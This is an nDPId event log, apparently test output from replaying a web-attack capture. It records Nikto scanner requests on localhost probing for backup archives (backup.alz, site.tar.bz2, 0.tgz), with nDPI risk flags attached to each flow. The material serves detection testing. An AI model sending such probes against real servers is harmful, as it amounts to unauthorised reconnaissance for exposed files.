-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277207,"pkt":"AAAAAAAAAAAAAAAACABFAADELblAAEAGDnl\/AAABfwAAAcQkH5A1yBUjW63h5IAYAED+uAAAAQEICp1m\/P+dZvz\/R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277209,"pkt":"AAAAAAAAAAAAAAAACABFAADDSgRAAEAG8i5\/AAABfwAAAcQmH5DZEXKVufuNq4AYAED+twAAAQEICp1m\/QCdZv0AR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277210,"pkt":"AAAAAAAAAAAAAAAACABFAADDtt9AAEAGhVN\/AAABfwAAAcQoH5DVr45M6gY7v4AYAED+twAAAQEICp1m\/QKdZv0CR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277211,"pkt":"AAAAAAAAAAAAAAAACABFAAC9XspAAEAG3W5\/AAABfwAAAcQqH5Bdf2ZfE+bMgYAYAED+sQAAAQEICp1m\/QOdZv0DR0VUIC8wLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277213,"pkt":"AAAAAAAAAAAAAAAACABFAAC9v\/9AAEAGfDl\/AAABfwAAAcQsH5CYPYdrmayyCIAYAED+sQAAAQEICp1m\/QWdZv0FR0VUIC8wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277215,"pkt":"AAAAAAAAAAAAAAAACABFAADCrDVAAEAGj\/5\/AAABfwAAAcQuH5DnZJSlMCY5doAYAED+tgAAAQEICp1m\/QedZv0GR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277216,"pkt":"AAAAAAAAAAAAAAAACABFAADC6alAAEAGUop\/AAABfwAAAcQwH5AB5dFAi0ifwYAYAED+tgAAAQEICp1m\/QidZv0IR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277217,"pkt":"AAAAAAAAAAAAAAAACABFAADHXwtAAEAG3SN\/AAABfwAAAcQyH5CeyGeSqwnqXYAYAED+uwAAAQEICp1m\/QmdZv0JR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277218,"pkt":"AAAAAAAAAAAAAAAACABFAADHKPlAAEAGEzZ\/AAABfwAAAcQ0H5BMBRBwjCFtgIAYAED+uwAAAQEICp1m\/QqdZv0KR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277219,"pkt":"AAAAAAAAAAAAAAAACABFAADE4jtAAEAGWfZ\/AAABfwAAAcQ2H5DSrNqhX1PVN4AYAED+uAAAAQEICp1m\/QudZv0LR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277221,"pkt":"AAAAAAAAAAAAAAAACABFAADEaVlAAEAG0th\/AAABfwAAAcQ4H5ChqlHP+pxqwIAYAED+uAAAAQEICp1m\/Q2dZv0NR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
